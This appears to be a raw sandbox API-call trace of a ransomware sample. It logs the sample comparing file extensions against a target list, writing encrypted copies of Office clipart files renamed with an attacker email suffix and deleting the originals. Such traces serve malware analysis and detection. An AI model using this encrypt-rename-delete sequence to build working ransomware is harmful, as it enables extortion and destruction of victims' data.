	[0139.260] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0139.261] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv") returned 67
	[0139.261] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv") returned 67
	[0139.261] lstrlenW (lpString=".doc") returned 4
	[0139.261] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0139.261] lstrlenW (lpString=".docx") returned 5
	[0139.261] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1
	[0139.261] lstrlenW (lpString=".pdf") returned 4
	[0139.261] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0139.261] lstrlenW (lpString=".xls") returned 4
	[0139.261] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0139.261] lstrlenW (lpString=".xlsx") returned 5
	[0139.261] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1
	[0139.261] lstrlenW (lpString=".ppt") returned 4
	[0139.261] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0139.261] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv") returned 67
	[0139.261] lstrlenW (lpString=".zip") returned 4
	[0139.261] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0139.261] lstrlenW (lpString=".rar") returned 4
	[0139.261] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0139.261] lstrlenW (lpString=".bz2") returned 4
	[0139.261] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0139.261] lstrlenW (lpString=".7z") returned 3
	[0139.261] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0139.261] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv") returned 67
	[0139.261] lstrlenW (lpString=".dbf") returned 4
	[0139.261] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0139.764] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.764] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04369_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0140.412] GetLastError () returned 0x0
	[0140.412] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x12c8, lpOverlapped=0x0) returned 1
	[0140.425] WriteFile (in: hFile=0x38c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x12d0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x12d0, lpOverlapped=0x0) returned 1
	[0140.426] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.426] WriteFile (in: hFile=0x38c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.426] SetEndOfFile (hFile=0x38c) returned 1
	[0140.430] CloseHandle (hObject=0x38c) returned 1
	[0140.430] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.430] SetEndOfFile (hFile=0x388) returned 1
	[0140.436] CloseHandle (hObject=0x388) returned 1
	[0140.436] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.436] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04369_.wmf")) returned 1
	[0140.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63
	[0140.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63
	[0140.437] lstrlenW (lpString=".doc") returned 4
	[0140.437] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.437] lstrlenW (lpString=".docx") returned 5
	[0140.437] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.437] lstrlenW (lpString=".pdf") returned 4
	[0140.437] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.437] lstrlenW (lpString=".xls") returned 4
	[0140.437] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.437] lstrlenW (lpString=".xlsx") returned 5
	[0140.437] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.437] lstrlenW (lpString=".ppt") returned 4
	[0140.437] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63
	[0140.437] lstrlenW (lpString=".zip") returned 4
	[0140.437] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.437] lstrlenW (lpString=".rar") returned 4
	[0140.437] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.437] lstrlenW (lpString=".bz2") returned 4
	[0140.437] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.437] lstrlenW (lpString=".7z") returned 3
	[0140.437] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.437] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63
	[0140.438] lstrlenW (lpString=".dbf") returned 4
	[0140.438] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63
	[0140.438] lstrlenW (lpString=".1cd") returned 4
	[0140.438] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63
	[0140.438] lstrlenW (lpString=".jpg") returned 4
	[0140.438] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63
	[0140.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63
	[0140.438] lstrlenW (lpString=".doc") returned 4
	[0140.438] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.438] lstrlenW (lpString=".docx") returned 5
	[0140.438] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.438] lstrlenW (lpString=".pdf") returned 4
	[0140.438] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.438] lstrlenW (lpString=".xls") returned 4
	[0140.438] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.438] lstrlenW (lpString=".xlsx") returned 5
	[0140.438] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.438] lstrlenW (lpString=".ppt") returned 4
	[0140.438] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63
	[0140.438] lstrlenW (lpString=".zip") returned 4
	[0140.438] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.438] lstrlenW (lpString=".rar") returned 4
	[0140.438] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.438] lstrlenW (lpString=".bz2") returned 4
	[0140.438] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.439] lstrlenW (lpString=".7z") returned 3
	[0140.439] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63
	[0140.439] lstrlenW (lpString=".dbf") returned 4
	[0140.439] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63
	[0140.439] lstrlenW (lpString=".1cd") returned 4
	[0140.439] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63
	[0140.439] lstrlenW (lpString=".jpg") returned 4
	[0140.439] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.439] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0140.439] lstrlenW (lpString="BD08758_.WMF") returned 12
	[0140.439] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0140.439] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=24320) returned 1
	[0140.439] CloseHandle (hObject=0x388) returned 1
	[0140.440] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf")) returned 0x20
	[0140.440] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.446] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0140.457] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.457] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.457] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0140.462] GetLastError () returned 0x0
	[0140.462] ReadFile (in: hFile=0x398, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x5f00, lpOverlapped=0x0) returned 1
	[0140.464] WriteFile (in: hFile=0x3a8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x5f10, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x5f10, lpOverlapped=0x0) returned 1
	[0140.465] ReadFile (in: hFile=0x398, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.465] WriteFile (in: hFile=0x3a8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.465] SetEndOfFile (hFile=0x3a8) returned 1
	[0140.465] CloseHandle (hObject=0x3a8) returned 1
	[0140.466] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.466] SetEndOfFile (hFile=0x398) returned 1
	[0140.468] CloseHandle (hObject=0x398) returned 1
	[0140.468] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.468] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf")) returned 1
	[0140.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63
	[0140.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63
	[0140.469] lstrlenW (lpString=".doc") returned 4
	[0140.469] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.469] lstrlenW (lpString=".docx") returned 5
	[0140.469] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.469] lstrlenW (lpString=".pdf") returned 4
	[0140.469] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.469] lstrlenW (lpString=".xls") returned 4
	[0140.469] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.469] lstrlenW (lpString=".xlsx") returned 5
	[0140.469] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.469] lstrlenW (lpString=".ppt") returned 4
	[0140.469] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63
	[0140.469] lstrlenW (lpString=".zip") returned 4
	[0140.469] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.469] lstrlenW (lpString=".rar") returned 4
	[0140.469] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.469] lstrlenW (lpString=".bz2") returned 4
	[0140.469] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.469] lstrlenW (lpString=".7z") returned 3
	[0140.469] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63
	[0140.470] lstrlenW (lpString=".dbf") returned 4
	[0140.470] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63
	[0140.470] lstrlenW (lpString=".1cd") returned 4
	[0140.470] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63
	[0140.470] lstrlenW (lpString=".jpg") returned 4
	[0140.470] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63
	[0140.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63
	[0140.470] lstrlenW (lpString=".doc") returned 4
	[0140.470] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.470] lstrlenW (lpString=".docx") returned 5
	[0140.470] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.470] lstrlenW (lpString=".pdf") returned 4
	[0140.470] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.470] lstrlenW (lpString=".xls") returned 4
	[0140.470] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.470] lstrlenW (lpString=".xlsx") returned 5
	[0140.470] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.470] lstrlenW (lpString=".ppt") returned 4
	[0140.470] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63
	[0140.470] lstrlenW (lpString=".zip") returned 4
	[0140.470] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.470] lstrlenW (lpString=".rar") returned 4
	[0140.470] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.470] lstrlenW (lpString=".bz2") returned 4
	[0140.470] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.470] lstrlenW (lpString=".7z") returned 3
	[0140.470] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63
	[0140.470] lstrlenW (lpString=".dbf") returned 4
	[0140.471] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63
	[0140.471] lstrlenW (lpString=".1cd") returned 4
	[0140.471] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 63
	[0140.471] lstrlenW (lpString=".jpg") returned 4
	[0140.471] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.471] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0140.471] lstrlenW (lpString="BD08868_.WMF") returned 12
	[0140.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0140.471] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=40206) returned 1
	[0140.471] CloseHandle (hObject=0x398) returned 1
	[0140.471] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf")) returned 0x20
	[0140.472] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.472] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0140.472] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.472] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.472] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0140.473] GetLastError () returned 0x0
	[0140.473] ReadFile (in: hFile=0x398, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x9d0e, lpOverlapped=0x0) returned 1
	[0140.475] WriteFile (in: hFile=0x3a8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x9d10, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x9d10, lpOverlapped=0x0) returned 1
	[0140.477] ReadFile (in: hFile=0x398, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.477] WriteFile (in: hFile=0x3a8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.477] SetEndOfFile (hFile=0x3a8) returned 1
	[0140.477] CloseHandle (hObject=0x3a8) returned 1
	[0140.477] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.477] SetEndOfFile (hFile=0x398) returned 1
	[0140.481] CloseHandle (hObject=0x398) returned 1
	[0140.482] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.482] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf")) returned 1
	[0140.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63
	[0140.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63
	[0140.482] lstrlenW (lpString=".doc") returned 4
	[0140.482] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.482] lstrlenW (lpString=".docx") returned 5
	[0140.482] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.483] lstrlenW (lpString=".pdf") returned 4
	[0140.483] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.483] lstrlenW (lpString=".xls") returned 4
	[0140.483] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.483] lstrlenW (lpString=".xlsx") returned 5
	[0140.483] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.483] lstrlenW (lpString=".ppt") returned 4
	[0140.483] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63
	[0140.483] lstrlenW (lpString=".zip") returned 4
	[0140.483] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.483] lstrlenW (lpString=".rar") returned 4
	[0140.483] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.483] lstrlenW (lpString=".bz2") returned 4
	[0140.483] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.483] lstrlenW (lpString=".7z") returned 3
	[0140.483] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63
	[0140.483] lstrlenW (lpString=".dbf") returned 4
	[0140.483] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63
	[0140.483] lstrlenW (lpString=".1cd") returned 4
	[0140.483] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63
	[0140.483] lstrlenW (lpString=".jpg") returned 4
	[0140.483] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63
	[0140.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63
	[0140.483] lstrlenW (lpString=".doc") returned 4
	[0140.483] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.483] lstrlenW (lpString=".docx") returned 5
	[0140.483] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.483] lstrlenW (lpString=".pdf") returned 4
	[0140.484] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.484] lstrlenW (lpString=".xls") returned 4
	[0140.484] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.484] lstrlenW (lpString=".xlsx") returned 5
	[0140.484] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.484] lstrlenW (lpString=".ppt") returned 4
	[0140.484] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63
	[0140.484] lstrlenW (lpString=".zip") returned 4
	[0140.484] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.484] lstrlenW (lpString=".rar") returned 4
	[0140.484] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.484] lstrlenW (lpString=".bz2") returned 4
	[0140.484] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.484] lstrlenW (lpString=".7z") returned 3
	[0140.484] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63
	[0140.484] lstrlenW (lpString=".dbf") returned 4
	[0140.484] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63
	[0140.484] lstrlenW (lpString=".1cd") returned 4
